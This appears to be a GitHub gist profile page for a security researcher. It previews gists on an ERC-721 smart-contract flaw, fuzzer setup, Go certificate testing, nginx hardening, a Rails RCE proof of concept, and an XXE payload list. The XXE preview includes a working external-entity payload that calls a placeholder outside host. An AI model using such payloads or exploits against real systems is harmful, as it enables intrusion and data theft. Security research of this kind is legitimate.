Skip to content

Instantly share code, notes, and snippets.

View B3nac's full-sized avatar
🌲
Dissociating

Kyle Benac B3nac

🌲
Dissociating
441 followers · 20 following
View GitHub Profile
@B3nac
B3nac / safeTransferFrom.md
Last active June 16, 2021 17:14

A Not So Safe safeTransferFrom Implementation

Hi all! It has been awhile since I've written a blog post. I've been researching smart contracts and creating my own game that integrates NFTs or (ERC 721) tokens. During this time I discovered a way to empty all Ethereum of the owner of a ERC 721 factory contract.

OpenZeppelin provides some awesome example contracts the one that I'm using as an example is located here https://docs.openzeppelin.com/contracts/3.x/erc721.

// contracts/GameItem.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
@B3nac
B3nac / winafl-setup.md
Last active May 15, 2024 08:26
How to setup winafl on Windows 10
@B3nac
B3nac / logwrapper.go
Last active September 23, 2019 23:54
Test certs remotely before connecting with client
// Package logwrapper implements a wrapper around the Go standard library's
// logging package. Clients should set the current log level; only
// messages below that level will actually be logged. For example, if
// Level is set to LevelWarning, only log messages at the Warning,
// Error, and Critical levels will be logged.
package logwrapper
import (
"fmt"
"log"
@B3nac
B3nac / remote-cert-test.go
Last active September 23, 2019 17:22
package main
import (
"fmt"
"crypto/x509"
"io/ioutil"
"encoding/pem"
"revoke"
"os"
"crypto/tls"
@B3nac
B3nac / broken_link_hijacking.md
Created September 5, 2017 00:41 — forked from EdOverflow/broken_link_hijacking.md
This post aims to give you a basic overview of the different issues that could possibly arise if a target links to an expired endpoint.
@B3nac
B3nac / nginx.conf
Created September 3, 2017 07:16 — forked from plentz/nginx.conf
Best nginx configuration for improved security(and performance). Complete blog post here http://tautt.com/best-nginx-configuration-for-security/
# to generate your dhparam.pem file, run in the terminal
openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048
@B3nac
B3nac / XXE_payloads
Created August 20, 2017 16:12 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@B3nac
B3nac / rails_rce.rb
Created August 6, 2017 18:17 — forked from postmodern/rails_rce.rb
Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156)
#!/usr/bin/env ruby
#
# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156)
#
# ## Advisory
#
# https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion
#
# ## Caveats
#